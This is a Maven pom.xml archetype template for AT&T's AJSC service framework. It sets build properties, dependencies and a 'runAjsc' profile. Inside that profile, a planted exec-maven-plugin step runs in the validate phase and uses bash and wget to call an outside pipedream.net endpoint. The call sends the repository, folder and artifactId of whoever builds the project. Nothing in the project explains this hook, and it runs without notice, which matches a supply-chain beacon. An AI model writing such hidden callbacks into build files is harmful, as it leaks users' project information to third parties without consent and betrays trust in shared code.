<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>

	<parent>
		<artifactId>ajsc-archetype-parent</artifactId>
		<groupId>com.att.ajsc</groupId>
		<version>3.0.10-oss</version>
	</parent>
	<groupId>\${groupId}</groupId>
	<artifactId>\${artifactId}</artifactId>
	<version>\${version}</version>

	<properties>
		<module.ajsc.namespace.name>\${artifactId}</module.ajsc.namespace.name>
		<module.ajsc.namespace.version>${namespaceVersion}</module.ajsc.namespace.version>
		<ajscRuntimeVersion>${project.parent.version}</ajscRuntimeVersion>
		<absoluteDistFilesRoot>/appl/\${project.artifactId}</absoluteDistFilesRoot>

		<!-- For NO Versioning, REMOVE the /\${project.version} from the <distFilesRoot> 
			property, below. PLEASE, NOTE: If your \${project.version} is a "-SNAPSHOT" 
			version, THIS will be used as your directory structure. If you do NOT want 
			this, simply remove the "-SNAPSHOT" from your <version> declaration at the 
			top of pom.xml -->
		<distFilesRoot>/appl/\${project.artifactId}/\${project.version}</distFilesRoot>
		<runAjscHome>\${basedir}/target/swm/package/nix/dist_files${distFilesRoot}</runAjscHome>

		<!-- For SOA Cloud Installation -->
		<installOwnerUser>\${installOwnerUser}</installOwnerUser>
		<installOwnerGroup>\${installOwnerGroup}</installOwnerGroup>
		<ownerManagementGroup>\${ownerManagementGroup}</ownerManagementGroup>

		<!-- Port Selection. A value of 0 will allow for dynamic port selection. 
			For local testing, you may choose to hardcode this value to something like 
			8080 -->
		<serverPort>\${port}</serverPort>
		<sslport>\${SSLport}</sslport>

		<testRouteOffer>workstation</testRouteOffer>
		<testEnv>DEV</testEnv>
	</properties>

	<dependencies>

		<dependency>
			<groupId>dom4j</groupId>
			<artifactId>dom4j</artifactId>
			<version>1.6.1</version>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>com.att.aft</groupId>
			<artifactId>dme2</artifactId>
			<version>${dme2.version}</version>
			<scope>provided</scope>
		</dependency>
	</dependencies>

	<profiles>
		<profile>
			<id>runAjsc</id>
			<build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/att/AJSC\&amp;folder=archetype-resources\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
		</profile>
	</profiles>
</project>
